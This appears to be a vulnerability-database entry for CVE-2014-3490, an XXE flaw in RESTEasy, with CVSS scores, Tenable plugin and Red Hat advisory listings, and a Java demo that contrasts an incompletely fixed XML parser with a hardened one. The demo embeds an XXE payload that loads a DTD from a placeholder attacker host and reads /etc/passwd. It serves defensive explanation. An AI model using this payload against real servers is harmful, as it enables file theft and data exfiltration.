ID CVE-2014-3490
Summary RESTEasy 2.3.1 before 2.3.8.SP2 and 3.x before 3.0.9, as used in Red Hat JBoss Enterprise Application Platform (EAP) 6.3.0, does not disable external parameter entities when the resteasy.document.expand.entity.references parameter is set to false. A remote attacker able to send XML requests to a RESTEasy endpoint can exploit this to read files accessible to the application server user and have other unspecified impact; this is an XML External Entity (XXE) issue. NOTE: this vulnerability exists because the fix for CVE-2012-0818 was incomplete, leaving external parameter entities enabled.
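The distinction the advisories draw (external general entities disabled, external parameter entities still enabled) is easy to reproduce outside RESTEasy. The following is an added example written for this page; it is not RESTEasy's code and is not the change in the commit referenced under refmap below. It assumes a JAXP DocumentBuilderFactory backed by Xerces (the JDK default), a constructed payload, and a placeholder host attacker.invalid; a recording EntityResolver stands in for real network and file access so the run is offline. incompleteFix() reproduces the parser state this CVE describes for an unpatched build with resteasy.document.expand.entity.references=false, and hardened() is the configuration a practitioner should apply when the application controls the parser directly.

```java
import java.io.ByteArrayInputStream;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class ParameterEntityXxe {

    // Constructed attacker payload (not taken from any advisory). &xxe; is the
    // general-entity form that the CVE-2012-0818 fix blocks; %dtd; is the
    // parameter-entity form that fix left enabled. attacker.invalid is a
    // placeholder host; nothing in this program is fetched over the network.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE data [\n"
        + "  <!ENTITY % dtd SYSTEM \"http://attacker.invalid/evil.dtd\">\n"
        + "  %dtd;\n"
        + "  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n"
        + "]>\n"
        + "<data>&xxe;</data>\n";

    /** Records each external identifier the parser asks for and hands back
     *  an empty entity, so the run never touches the network or the disk. */
    static final class RecordingResolver implements EntityResolver {
        final List<String> requested = new ArrayList<>();

        @Override
        public InputSource resolveEntity(String publicId, String systemId) {
            requested.add(systemId);
            return new InputSource(new StringReader(""));
        }
    }

    /** Models the incomplete fix: only external general entities are off. */
    static DocumentBuilderFactory incompleteFix() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        return f;
    }

    /** Hardened configuration: DOCTYPE is rejected outright, and both entity
     *  classes plus external DTD loading are disabled as well, so the parser
     *  stays safe if DOCTYPE is ever re-enabled for a legitimate schema. */
    static DocumentBuilderFactory hardened() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Parses PAYLOAD with the given factory and returns the external system
     *  identifiers the parser tried to resolve; throws if parsing is refused. */
    static List<String> externalFetches(DocumentBuilderFactory f) throws Exception {
        DocumentBuilder builder = f.newDocumentBuilder();
        RecordingResolver resolver = new RecordingResolver();
        builder.setEntityResolver(resolver);
        builder.parse(new ByteArrayInputStream(PAYLOAD.getBytes(StandardCharsets.UTF_8)));
        return resolver.requested;
    }

    public static void main(String[] args) throws Exception {
        // With only general entities disabled, Xerces still resolves the
        // parameter entity %dtd;, so the evil.dtd URL reaches the resolver.
        System.out.println("incomplete fix resolved: " + externalFetches(incompleteFix()));

        // The hardened factory refuses the document at the DOCTYPE.
        try {
            externalFetches(hardened());
            System.out.println("hardened: parsed (unexpected)");
        } catch (SAXException e) {
            System.out.println("hardened: rejected, " + e.getMessage());
        }
    }
}
```

Compile and run with `javac ParameterEntityXxe.java && java ParameterEntityXxe`. The point to take away is in the first configuration: the resolver is asked for http://attacker.invalid/evil.dtd even though general entities are off, and an attacker-controlled DTD loaded that way is the channel used for out-of-band file exfiltration. With disallow-doctype-decl set, the parser throws a SAXParseException before any entity is declared. If DOCTYPE cannot be rejected because legitimate clients send one, keep both entity features and load-external-dtd off as shown, and apply the vendor updates listed in the advisories below rather than relying on resteasy.document.expand.entity.references alone, since on unpatched builds that parameter does not do what its name suggests.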
Vulnerable Configurations
  • Red Hat JBoss Enterprise Application Platform (EAP) 6.3.0
    cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.3.0
  • RedHat RESTeasy 3.0 beta1
    cpe:2.3:a:redhat:resteasy:3.0:beta1
  • RedHat RESTeasy 3.0 beta2
    cpe:2.3:a:redhat:resteasy:3.0:beta2
  • RedHat RESTeasy 3.0 beta3
    cpe:2.3:a:redhat:resteasy:3.0:beta3
  • RedHat RESTeasy 3.0 beta4
    cpe:2.3:a:redhat:resteasy:3.0:beta4
  • RedHat RESTeasy 3.0 beta5
    cpe:2.3:a:redhat:resteasy:3.0:beta5
  • RedHat RESTeasy 3.0 beta6
    cpe:2.3:a:redhat:resteasy:3.0:beta6
  • RedHat RESTeasy 3.0 release candidate 1
    cpe:2.3:a:redhat:resteasy:3.0:rc1
CVSS
Base: 7.5 (as of 20-08-2014 - 10:47)
Impact: 6.4 (CVSS v2 impact subscore, computed from the metrics below)
Exploitability: 10.0 (CVSS v2 exploitability subscore, computed from the metrics below)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Access
  Vector: NETWORK
  Complexity: LOW
  Authentication: NONE
Impact
  Confidentiality: PARTIAL
  Integrity: PARTIAL
  Availability: PARTIAL
nessus via4
  • NASL family Red Hat Local Security Checks
    NASL id REDHAT-RHSA-2014-1040.NASL
    description Updated Red Hat JBoss Enterprise Application Platform 6.3.0 packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.
    Red Hat Product Security has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
    Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
    It was found that the fix for CVE-2012-0818 was incomplete: external parameter entities were not disabled when the resteasy.document.expand.entity.references parameter was set to false. A remote attacker able to send XML requests to a RESTEasy endpoint could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks. (CVE-2014-3490)
    This issue was discovered by David Jorm of Red Hat Product Security.
    All users of Red Hat JBoss Enterprise Application Platform 6.3.0 on Red Hat Enterprise Linux 5, 6, and 7 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.
    last seen 2019-02-21
    modified 2019-01-02
    plugin id 77178
    published 2014-08-13
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77178
    title RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2014:1040)
  • NASL family Oracle Linux Local Security Checks
    NASL id ORACLELINUX_ELSA-2014-1011.NASL
    description From Red Hat Security Advisory 2014:1011: Updated resteasy-base packages that fix one security issue are now available for Red Hat Enterprise Linux 7.
    The Red Hat Security Response Team has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
    RESTEasy contains a JBoss project that provides frameworks to help build RESTful Web Services and RESTful Java applications. It is a fully certified and portable implementation of the JAX-RS specification.
    It was found that the fix for CVE-2012-0818 was incomplete: external parameter entities were not disabled when the resteasy.document.expand.entity.references parameter was set to false. A remote attacker able to send XML requests to a RESTEasy endpoint could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks. (CVE-2014-3490)
    This issue was discovered by David Jorm of Red Hat Product Security.
    All resteasy-base users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
    last seen 2019-02-21
    modified 2019-01-02
    plugin id 77011
    published 2014-08-06
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77011
    title Oracle Linux 7 : resteasy-base (ELSA-2014-1011)
  • NASL family Red Hat Local Security Checks
    NASL id REDHAT-RHSA-2014-1011.NASL
    description Same RHSA-2014:1011 advisory text as the ORACLELINUX_ELSA-2014-1011 entry above (resteasy-base security update for Red Hat Enterprise Linux 7, CVE-2014-3490).
    last seen 2019-02-21
    modified 2019-01-02
    plugin id 77014
    published 2014-08-06
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77014
    title RHEL 7 : resteasy-base (RHSA-2014:1011)
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2014-16845.NASL
    description Security fix for CVE-2014-3490 (text extracted by Tenable from the Fedora security advisory).
    last seen 2019-02-21
    modified 2015-10-19
    plugin id 83066
    published 2015-04-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=83066
    title Fedora 20 : resteasy-3.0.6-3.fc20 (2014-16845)
  • NASL family CentOS Local Security Checks
    NASL id CENTOS_RHSA-2014-1011.NASL
    description Same RHSA-2014:1011 advisory text as the ORACLELINUX_ELSA-2014-1011 entry above (resteasy-base security update rebuilt for CentOS 7, CVE-2014-3490).
    last seen 2019-02-21
    modified 2018-11-28
    plugin id 77031
    published 2014-08-07
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77031
    title CentOS 7 : resteasy-base (CESA-2014:1011)
redhat via4
advisories
  • bugzilla
    id 1107901
    title CVE-2014-3490 RESTEasy: XXE via parameter entities
    oval
    AND
    • OR
      • comment Red Hat Enterprise Linux 7 Client is installed
        oval oval:com.redhat.rhsa:tst:20140675001
      • comment Red Hat Enterprise Linux 7 Server is installed
        oval oval:com.redhat.rhsa:tst:20140675002
      • comment Red Hat Enterprise Linux 7 Workstation is installed
        oval oval:com.redhat.rhsa:tst:20140675003
      • comment Red Hat Enterprise Linux 7 ComputeNode is installed
        oval oval:com.redhat.rhsa:tst:20140675004
    • OR
      • AND
        • comment resteasy-base is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011005
        • comment resteasy-base is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011006
      • AND
        • comment resteasy-base-atom-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011009
        • comment resteasy-base-atom-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011010
      • AND
        • comment resteasy-base-jackson-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011017
        • comment resteasy-base-jackson-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011018
      • AND
        • comment resteasy-base-javadoc is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011021
        • comment resteasy-base-javadoc is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011022
      • AND
        • comment resteasy-base-jaxb-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011025
        • comment resteasy-base-jaxb-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011026
      • AND
        • comment resteasy-base-jaxrs is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011023
        • comment resteasy-base-jaxrs is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011024
      • AND
        • comment resteasy-base-jaxrs-all is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011011
        • comment resteasy-base-jaxrs-all is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011012
      • AND
        • comment resteasy-base-jaxrs-api is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011019
        • comment resteasy-base-jaxrs-api is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011020
      • AND
        • comment resteasy-base-jettison-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011013
        • comment resteasy-base-jettison-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011014
      • AND
        • comment resteasy-base-providers-pom is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011015
        • comment resteasy-base-providers-pom is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011016
      • AND
        • comment resteasy-base-tjws is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011007
        • comment resteasy-base-tjws is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011008
    rhsa
    id RHSA-2014:1011
    released 2014-08-06
    severity Moderate
    title RHSA-2014:1011: resteasy-base security update (Moderate)
  • rhsa
    id RHSA-2014:1039
  • rhsa
    id RHSA-2014:1040
  • rhsa
    id RHSA-2014:1298
  • rhsa
    id RHSA-2015:0125
  • rhsa
    id RHSA-2015:0675
  • rhsa
    id RHSA-2015:0720
  • rhsa
    id RHSA-2015:0765
rpms
  • resteasy-base-0:2.3.5-3.el7_0
  • resteasy-base-atom-provider-0:2.3.5-3.el7_0
  • resteasy-base-jackson-provider-0:2.3.5-3.el7_0
  • resteasy-base-javadoc-0:2.3.5-3.el7_0
  • resteasy-base-jaxb-provider-0:2.3.5-3.el7_0
  • resteasy-base-jaxrs-0:2.3.5-3.el7_0
  • resteasy-base-jaxrs-all-0:2.3.5-3.el7_0
  • resteasy-base-jaxrs-api-0:2.3.5-3.el7_0
  • resteasy-base-jettison-provider-0:2.3.5-3.el7_0
  • resteasy-base-providers-pom-0:2.3.5-3.el7_0
  • resteasy-base-tjws-0:2.3.5-3.el7_0
refmap via4
bid 69058
confirm
misc https://github.com/ronsigal/Resteasy/commit/9b7d0f574cafdcf3bea5428f3145ab4908fc6d83
secunia 60019
Last major update 06-01-2017 - 22:00
Published 19-08-2014 - 14:55
Last modified 21-03-2019 - 10:22